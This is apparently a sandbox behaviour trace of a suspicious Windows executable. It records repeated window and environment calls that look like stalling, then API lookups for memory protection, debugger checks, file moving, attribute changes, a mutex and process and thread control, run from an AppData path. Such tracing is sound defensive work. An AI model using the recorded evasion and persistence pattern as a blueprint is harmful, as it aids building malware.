| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75c14bf0 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75c07810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75c07a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75c07600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75c0a700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75c15100 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75c07a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75c17b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75c08bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75c07990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x770e7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75c03870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75c16630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75c17020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x75c16c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x75c32430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x75c0ab60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75c02af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75c01b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x770dd830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75c0a2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75c078b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75c02ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75c03880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75c07710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x75c0a6e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75c16aa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x770d0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75c0a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75c0a720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75c16ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75c09b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75c038a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75c023e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75c07620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x75c0aac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x75c0a7e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75c0b0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75c09bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x75c32670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x75c0a940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75c16730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75c038c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75c15100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x75c0a120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x75c01b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x75c029d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75c0a040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75c09bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770bf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770bf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75c01ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75c0a790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x75c08500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x75c15140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75c0a290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x75c07930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x75c08c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x75c319a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770b2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x770aefe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75c07950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x770abb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x75c09f30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75c169b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75c16f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75c16f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75c16890 |
|
1 | |
| Module | Load | module_name = msvcr100.dll, base_address = 0x70350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7036c544 |
|
1 | |
| System | Get Time | type = System Time, time = 1627-01-28 15:07:34 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75c0a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75c14ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75c07570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75c09e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75c16740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x75c166a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x75c16700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75c0b040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75c0ace0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x770c7dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x770d4010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x770d2a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75c0a7b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x770d2290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x770d2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x770f7a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x770eac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x770da890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x75c0ac80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x75c30830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x764c6270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x75c0fe80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x75c0ff80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x75c30e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x75c0a750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x75c31240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x75c0ad60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x75c31460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x75c09a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x7644ded0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75c03630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75c16bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75c16c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75c16a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75c03870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75c0b1d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75c2d260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75c16c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75c166f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75c16a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x770e1a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75c16820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75c15eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x770da200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75c08bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75c09fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75c10160 |
|
1 | |
